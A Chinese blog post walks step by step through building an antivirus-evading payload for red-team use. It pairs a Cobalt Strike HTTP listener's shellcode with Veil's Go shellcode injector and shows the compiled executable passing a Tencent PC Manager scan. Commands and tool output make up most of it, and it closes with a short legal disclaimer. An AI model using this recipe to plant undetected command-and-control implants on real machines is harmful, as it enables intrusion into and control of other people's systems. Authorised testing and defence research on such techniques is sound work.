记录一次绕过杀软的过程

  • A+

一、背景

在做红队渗透时,经常会遇到目标机安装了各种杀毒软件,诸如360、腾讯管家之类的。导致生成的payload总是无法利用且被杀软强制删除的事情时常发生。这个东西真的很烦人,烦死了!只能停下来去研究一下杀软的原理以及如何绕过。在此记录下来做个备忘录。

二、需要用到的工具

cobalt strike:这个是在做红队渗透时用到的一款软件,具有团队协作和生成payload的工具。主要有两个部分组成,一个是服务器端,一个是客户端,服务器端只支持Linux,客户端MacOS、Windows、Linux都支持。软件运行前提是要安装java。

相关链接:https://www.cobaltstrike.com/

Veil:这个是一款生成payload并绕过杀软的一款工具。

相关链接:https://github.com/Veil-Framework/Veil

三、免杀步骤

3.1 设置CS服务器端和客户端

在这里提醒一下,如果你的CS展开目录之后文件没有执行权限,是无法运行的,所以需要给CS目录下的文件添加执行权限。
chmod +x 文件名
运行CS服务端
```
(base) [email protected]:~/python/cs4.0# ifconfig
eth0: flags=4163 mtu 1500
inet 192.168.91.156 netmask 255.255.255.0 broadcast 192.168.91.255
inet6 fe80::20c:33ff:dfbf:dfa3 prefixlen 64 scopeid 0x20
ether 00:0c:29:bf:3a:23 txqueuelen 1000 (Ethernet)
RX packets 130003 bytes 193285222 (184.3 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 81397 bytes 4399635 (4.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
device interrupt 19 base 0x2000

lo: flags=73 mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1000 (Local Loopback)
RX packets 24 bytes 1356 (1.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 24 bytes 1356 (1.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
(base) [email protected]:~/python/cs4.0# ./teamserver 192.168.91.156 123456
[] Will use existing X509 certificate and keystore (for SSL)
[+] Team server is up on 50050
[
] SHA256 hash of SSL cert is:
[+] Listener: test started!
```
运行CS客户端

image.png
点击【连接】即可打开CS客户端。

3.2利用CS生成payload

image.png

监听器类型设置为http类型

image.png
选择【Choose】,生成payload保存在文件夹备用。

3.3安装veil

建议在Kali系统里使用快速安装命令
apt -y install veil
/usr/share/veil/config/setup.sh --force --silent

安装过程比较慢,且需要挂代理。

安装时会自动下载安装依赖软件,安装成功后在终端输入veil,弹出如下信息即安装成功:
```
(base) [email protected]:~# veil
===============================================================================
Veil | [Version]: 3.1.12
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Main Menu

2 tools loaded

Available Tools:

1)  Evasion
2)  Ordnance

Available Commands:

exit            Completely exit Veil
info            Information on a specific tool
list            List available tools
options         Show Veil configuration
update          Update Veil
use         Use a specific tool

Veil>;:
```

3.4生成免杀payload

在veil里输入
use 1

image.png
可以看到Veil里总共有41种payload,我们输入list查看所有payload
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
[*] Available Payloads:
1) autoit/shellcode_inject/flat.py
2) auxiliary/coldwar_wrapper.py
3) auxiliary/macro_converter.py
4) auxiliary/pyinstaller_wrapper.py
5) c/meterpreter/rev_http.py
6) c/meterpreter/rev_http_service.py
7) c/meterpreter/rev_tcp.py
8) c/meterpreter/rev_tcp_service.py
9) cs/meterpreter/rev_http.py
10) cs/meterpreter/rev_https.py
11) cs/meterpreter/rev_tcp.py
12) cs/shellcode_inject/base64.py
13) cs/shellcode_inject/virtual.py
14) go/meterpreter/rev_http.py
15) go/meterpreter/rev_https.py
16) go/meterpreter/rev_tcp.py
17) go/shellcode_inject/virtual.py
18) lua/shellcode_inject/flat.py
19) perl/shellcode_inject/flat.py
20) powershell/meterpreter/rev_http.py
21) powershell/meterpreter/rev_https.py
22) powershell/meterpreter/rev_tcp.py
23) powershell/shellcode_inject/psexec_virtual.py
24) powershell/shellcode_inject/virtual.py
25) python/meterpreter/bind_tcp.py
26) python/meterpreter/rev_http.py
27) python/meterpreter/rev_https.py
28) python/meterpreter/rev_tcp.py
29) python/shellcode_inject/aes_encrypt.py
30) python/shellcode_inject/arc_encrypt.py
31) python/shellcode_inject/base64_substitution.py
32) python/shellcode_inject/des_encrypt.py
33) python/shellcode_inject/flat.py
34) python/shellcode_inject/letter_substitution.py
35) python/shellcode_inject/pidinject.py
36) python/shellcode_inject/stallion.py
37) ruby/meterpreter/rev_http.py
38) ruby/meterpreter/rev_https.py
39) ruby/meterpreter/rev_tcp.py
40) ruby/shellcode_inject/base64.py
41) ruby/shellcode_inject/flat.py

我们选择Go语言生成shellcode。
Veil/Evasion>: use 17
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
Payload Information:
Name: Golang Flat Shellcode Injector
Language: go
Rating: Normal
Description: Golang VirtualAlloc method for inline shellcode
injection
Payload: go/shellcode_inject/virtual selected
Required Options:
Name Value Description
---- ----- -----------
BADMACS FALSE Check for VM based MAC addresses
CLICKTRACK X Require X number of clicks before execution
COMPILE_TO_EXE Y Compile to an executable
CURSORCHECK FALSE Check for mouse movements
DISKSIZE X Check for a minimum number of gigs for hard disk
HOSTNAME X Optional: Required system hostname
INJECT_METHOD Virtual Virtual or Heap
MINPROCS X Minimum number of running processes
PROCCHECK FALSE Check for active VM processes
PROCESSORS X Optional: Minimum number of processors
RAMCHECK FALSE Check for at least 3 gigs of RAM
SLEEP X Optional: Sleep "Y" seconds, check if accelerated
USERNAME X Optional: The required user account
USERPROMPT FALSE Prompt user prior to injection
UTCCHECK FALSE Check if system uses UTC time
Available Commands:
back Go back to Veil-Evasion
exit Completely exit Veil
generate Generate the payload
options Show the shellcode's options
set Set shellcode option

输入【generate】
```

[?] Generate or supply custom shellcode?
1 - Ordnance (default)
2 - MSFVenom
3 - Custom shellcode string
4 - File with shellcode (x41x42..)
5 - Binary file with shellcode
[>] Please enter the number of your choice: 3
[>] Please enter custom shellcode (one line, no quotes, x00.. format):
在上面输入CS生成的Payload,设置文件名,就生成了一个免杀payload。
[*] Using pre-generated shellcode...
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

[>] Please enter the base name for output files (default is payload): helloworld.exe
runtime/internal/sys
runtime/internal/atomic
runtime
errors
internal/race
sync/atomic
math
internal/syscall/windows/sysdll
unicode/utf16
unicode/utf8
sync
io
syscall
strconv
internal/syscall/windows
internal/syscall/windows/registry
time
reflect
os
fmt
command-line-arguments
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
[] Language: go
[
] Payload Module: go/shellcode_inject/virtual
[] Executable written to: /var/lib/veil/output/compiled/helloworld.exe.exe
[
] Source code written to: /var/lib/veil/output/source/helloworld.exe.go
```
生成的payload存放路径会在shell里说明,找到那个文件,放在安装了腾讯电脑管家的虚拟机里运行一下看看会不会报毒。

image.png

image.png

接下来用电脑管家查杀一下刚才生成的payload。

image.png
即可成功绕过腾讯电脑管家。接下来就是双击运行,等待CS上线对话做后渗透阶段一把梭了。

以上内容仅作安全研究使用,请勿做非法事情。坚守自己的底线,做守法公民。

相关推荐: 发卡网审计

发卡网代码审计 这是前段时间写的,今天发一下记录一下吧,怕以后找不到了 2020-3-10 0x00 前言 前端时间看moonsec的直播代码审计,今天下载来复现一波。下载地址:https://www.lanzous.com/i53acdi 0x01 代码审计…